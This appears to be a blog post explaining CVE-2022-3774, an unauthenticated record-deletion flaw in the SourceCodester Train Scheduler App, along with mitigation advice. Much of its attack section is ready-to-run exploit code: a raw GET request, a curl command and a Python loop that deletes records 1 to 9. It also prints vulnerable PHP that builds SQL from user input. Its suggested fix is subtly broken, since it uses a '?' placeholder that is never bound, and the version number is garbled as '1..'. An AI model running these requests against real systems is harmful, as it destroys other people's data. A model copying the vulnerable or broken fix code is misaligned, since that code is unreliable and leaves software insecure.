In October 2022, a severe security vulnerability (CVE-2022-3774, tracked also as VDB-212504) was found in the SourceCodester Train Scheduler App version 1.. This flaw is embedded in a file called /train_scheduler_app/?action=delete and exposes the app to Improper Control of Resource Identifiers, which can let remote attackers delete unintended data by meddling with the id parameter in requests.
This post breaks down what makes this vulnerability critical, how an attack works, provides easy-to-understand exploit code snippets, and highlights key references. We'll take you step-by-step through the mechanics, so even if you’re not a security expert, you’ll understand how real-world exploitation happens.
What’s Actually Wrong?
The delete action inside the Train Scheduler app uses the URL parameter id to identify which record to delete. However, the code does not properly validate or restrict which records can be specified by a user. This means anyone who can access the endpoint can send a request with any record id, even if they shouldn't have that control.
The problematic endpoint is
/train_scheduler_app/?action=delete&id=[number]
Here’s what an attacker might send to exploit this bug
GET /train_scheduler_app/?action=delete&id=2 HTTP/1.1
Host: vulnerable-site.com
Cookie: PHPSESSID=attacker_session
Or using curl from the command line
curl "http://vulnerable-site.com/train_scheduler_app/?action=delete&id=2";
Inspecting the Vulnerable Code (Pseudo-code)
While the original PHP code isn’t published openly, exploit writers have reported the logic looks roughly like this:
if ($_GET['action'] == 'delete' && isset($_GET['id'])) {
$id = $_GET['id'];
// SQL: DELETE FROM schedules WHERE id = $id
$pdo->query("DELETE FROM schedules WHERE id = '$id'");
header('Location: /train_scheduler_app/?action=list');
}
Problems
- No user/session check!
No filtering of what IDs are allowed!
- Possibly even SQL injection if $id is not sanitized (not confirmed in this case, but dangerous).
Attacker finds or guesses an id value for a schedule record.
2. Attacker sends a crafted GET request to /train_scheduler_app/?action=delete&id=[victim_id].
You can perform this with basic tools, but below is a Python script demonstrating automated attack
import requests
target = "http://vulnerable-site.com/train_scheduler_app/?action=delete&id=";
for record_id in range(1, 10): # Try deleting IDs 1-9
url = target + str(record_id)
response = requests.get(url)
print(f"Tried deleting id={record_id}, HTTP status: {response.status_code}")
Warning: Don’t use this unless you have permission. This code is for education and testing on your own systems.
Responsible Disclosure & Vendor Status
- VulDB Advisory VDB-212504
- CVE Page for CVE-2022-3774
As of last update, no public patch or fix is listed for version 1.. If you use this app, consider disabling or restricting access to the delete endpoint and implementing proper access controls immediately.
Example (Very Simplified PHP)
// Only delete if logged in, user owns record, and using POST
if ($_SERVER['REQUEST_METHOD'] === 'POST' &&
$_SESSION['user_id'] &&
user_owns_record($_SESSION['user_id'], $_POST['id'])) {
$pdo->query("DELETE FROM schedules WHERE id = ?");
}
Conclusion and Takeaways
- CVE-2022-3774 (VDB-212504) is highly critical: It lets attackers delete arbitrary train schedules just by sending a simple GET request with an id parameter. No login required.
- If you run SourceCodester Train Scheduler App 1., mitigate immediately: Restrict public access, and roll custom patches if needed.
- Web app devs: *Never* trust user input for sensitive actions. Validate everything and follow least-privilege.
References
- VulDB Advisory
- CVE Details — CVE-2022-3774
- SourceCodester Download Page (archived)
> Stay safe and always validate access before destructive actions!
Timeline
Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 16:27:00 UTC